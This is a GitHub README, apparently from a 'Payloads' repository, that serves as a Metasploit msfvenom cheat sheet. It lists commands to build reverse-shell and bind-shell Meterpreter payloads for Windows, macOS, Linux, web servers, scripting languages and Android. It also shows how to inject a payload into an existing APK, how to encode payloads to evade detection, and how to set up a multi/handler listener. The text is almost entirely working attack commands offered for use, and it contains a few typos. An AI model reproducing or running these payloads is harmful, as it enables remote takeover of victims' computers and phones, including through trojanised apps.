Skip to content

Latest commit

 

History

History
92 lines (64 loc) · 3.66 KB

README.md

File metadata and controls

92 lines (64 loc) · 3.66 KB

Payloads

Android and different os payloads easy to modify and inject

Cheetsheet Metasploit

Windows Payloads Windows Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe 

Windows Reverse Shell

 msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe 

Windows Encoded Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe 

Windows Meterpreter Reverse Shellcode

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform  

macOS Payloads macOS Bind Shell

 msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho 

macOS Reverse Shell

 msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho 

macOS Reverse TCP Shellcode

 msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform  

Linux Payloads Linux Meterpreter TCP Reverse Shell

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf 

Linux Bind TCP Shell

 msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf 

Linux Bind Meterpreter TCP Shell

 msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf 

Linux Meterpreter Reverse Shellcode

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform  

Web-base Payloads PHP Meterpreter Reverse Shell

 msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php 

JSP Java Meterpreter Reverse Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp 

ASP Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp 

WAR Reverse TCP Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war 

Script-Base Payloads Perl Unix Reverse shell

 msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl 

Bash Unix Reverse Shell

 msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh 

Python Reverse Shell

 msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py 

Android Payloads Android Meterpreter reverse Payload

 msfvenom -p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk 

Android Bind Meterpreter Payload

 msfvenom -x app.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o out.apk 
msfvenom --platform android --arch dalvik -x myApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168** LPORT=7777 -o build.apk

#Save AS explort.rc Run command


# msfconsole -q -r 'export.rc'
# nano export.r
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 5576
set ExitOnSession false
set EnableStageEncoding true
run -j

..........................................read more